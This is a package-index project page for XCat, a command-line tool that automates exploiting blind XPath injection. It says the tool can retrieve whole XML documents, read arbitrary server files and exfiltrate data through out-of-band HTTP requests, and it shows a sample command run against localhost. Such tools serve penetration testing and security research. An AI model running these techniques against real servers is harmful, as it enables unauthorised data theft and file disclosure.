Skip to main content

A command line tool to automate the exploitation of blind XPath injection vulnerabilities

Project description

XCat is a command line program that aides in the exploitation of blind XPath injection vulnerabilities. It can be used to retrieve the whole XML document being processed by a vulnerable XPath query, read arbitrary files on the hosts filesystem and utilize out of bound HTTP requests to make the server send data directly to xcat.

XCat is built to exploit boolean XPath injections (Where only one bit of data can be extracted in one request) and it requires you to manually identify the exploit first, this does not do that for you. Check out the docs at http://xcat.readthedocs.org/ for more info.

Note: This requires Python 3.4 to run.

An example:

>> xcat --public-ip="localhost" http://localhost:80 title=Bible title "Book found" run retrieve
Injecting using SingleQuoteString
Detecting features...
Supported features: XPath 2, String to codepoints, External DOC function, Entity injection, Substring search speedup
Retrieving /*[1]
<?xml version="1.0" encoding="utf-8"?>
<lib test="1" attribute1="3">
    <book>
            <!-- Comment -->
            <title>Bible</title>
            <description another="attribute">The holy book</description>
...

Project details


Release history Release notifications

History Node

0.9

History Node

0.7.1

This version
History Node

0.7

History Node

0.6.1

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Filename, size & hash SHA256 hash help File type Python version Upload date
xcat-0.7.zip (25.7 kB) Copy SHA256 hash SHA256 Source None Jul 17, 2014

Supported by

Elastic Elastic Search Pingdom Pingdom Monitoring Google Google BigQuery Sentry Sentry Error logging CloudAMQP CloudAMQP RabbitMQ AWS AWS Cloud computing Fastly Fastly CDN DigiCert DigiCert EV certificate StatusPage StatusPage Status page